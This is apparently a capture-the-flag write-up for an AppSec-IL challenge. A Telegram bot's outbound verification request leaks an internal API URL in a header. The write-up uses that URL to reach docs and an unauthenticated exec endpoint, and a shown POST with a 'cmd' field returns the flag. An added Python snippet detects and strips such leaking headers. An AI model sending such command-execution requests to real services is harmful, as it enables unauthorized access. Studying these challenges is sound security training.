First, interact with the Telegram bot `@CSAdmin2020bot`.

Submit your website URL to the bot for verification:

```
https://xxx.xxx/verify.txt
```

Look at the request the bot makes to your server:

```
GET /verify.txt HTTP/1.1
Accept: application/json, text/plain, */*
X-Sent-By: ServiceBot/1.0
user-agent: ServiceBot/1.0
API-Method: https://api-customerservice.appsecil.ctf.today/v1/internal/bot/api/scan?url=http://xxx.xxx/verify.txt
Host: xxx.xxx
Connection: close
```

The `API-Method` header leaks the bot's internal backend, so you can visit: `https://api-customerservice.appsecil.ctf.today/v1/internal/bot/api/scan`
and `https://api-customerservice.appsecil.ctf.today/v1/internal/bot/`
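
As an added defender-side example (not part of the original writeup), the check below parses a captured outbound request like the one above, flags any header carrying a URL to an internal endpoint other than the site being fetched, and strips those headers before the fetcher sends them. The sample request is constructed from the writeup; the internal path markers and hostname suffixes are assumptions.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample: the request the verification bot sent to the submitted
# site, as captured in the writeup (the API-Method header is the leak).
SAMPLE_REQUEST = """GET /verify.txt HTTP/1.1
Accept: application/json, text/plain, */*
X-Sent-By: ServiceBot/1.0
user-agent: ServiceBot/1.0
API-Method: https://api-customerservice.appsecil.ctf.today/v1/internal/bot/api/scan?url=http://xxx.xxx/verify.txt
Host: xxx.xxx
Connection: close
"""

URL_RE = re.compile(r"https?://[^\s,;\"'<>]+")
# Assumption: path segments that mark an endpoint as internal-only.
INTERNAL_PATH_MARKERS = ("/internal/", "/admin/", "/debug/")

def is_private_host(host):
    """True for private/loopback IP literals or hosts on internal-only suffixes (assumed list)."""
    try:
        return ip_address(host).is_private
    except ValueError:
        return host.endswith((".internal", ".local", "localhost"))

def parse_headers(raw):
    """Raw HTTP/1.1 request text -> [(lowercased header name, value), ...]; body ignored."""
    headers = []
    for line in raw.split("\n\n", 1)[0].strip().splitlines()[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers

def leaked_internal_urls(raw, destination_host):
    """(header, url) pairs where a header carries a URL to an internal endpoint
    other than the site being fetched: what exposed the bot's backend here."""
    findings = []
    for name, value in parse_headers(raw):
        for url in URL_RE.findall(value):
            p = urlparse(url)
            if p.hostname is None or p.hostname == destination_host:
                continue  # a URL naming the destination itself is fine
            if is_private_host(p.hostname) or any(m in p.path for m in INTERNAL_PATH_MARKERS):
                findings.append((name, url))
    return findings

def strip_leaking_headers(raw, destination_host):
    """Mitigation: drop the offending headers before the fetcher sends them."""
    bad = {name for name, _ in leaked_internal_urls(raw, destination_host)}
    return [(n, v) for n, v in parse_headers(raw) if n not in bad]
```

Running `leaked_internal_urls(SAMPLE_REQUEST, "xxx.xxx")` reports the `api-method` header and its internal URL; the same check can run in the fetcher's request middleware or over proxy logs.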

The response:

```
Welcome to ServiceBot server. Please checkout documention (https://api-customerservice.appsecil.ctf.today/v1/internal/bot/docs) for development.
```

The docs list a `/v1/internal/bot/api/assets/exec` API that runs a supplied `cmd`; one request to it captures the flag.

The request:

```
POST /v1/internal/bot/api/assets/exec HTTP/1.1
Host: api-customerservice.appsecil.ctf.today
Connection: close
Content-Length: 17
sec-ch-ua: "Chromium";v="86", "\"Not\\A;Brand";v="99", "Google Chrome";v="86"
accept: application/json
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Content-Type: application/json
Origin: https://api-customerservice.appsecil.ctf.today
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://api-customerservice.appsecil.ctf.today/v1/internal/bot/docs/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=de841180ad593ef31014e339d62331ca11603713409

{
"cmd": "ls"
}
```

The response:

```
HTTP/1.1 200 OK
x-powered-by: Express
server: OWASPIL/20.20
access-control-allow-origin: *
access-control-allow-methods: GET,PUT,POST,DELETE
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
content-type: application/json; charset=utf-8
content-length: 80
etag: W/"50-2u6giumlY9sWoXJx1GIEEgv3o1E"
date: Tue, 27 Oct 2020 03:37:51 GMT
connection: close

{"msg":"Congrats! Your flag: AppSec-IL{B0t_Do3nt_M34n_S3cure_A7i}","status":200}
```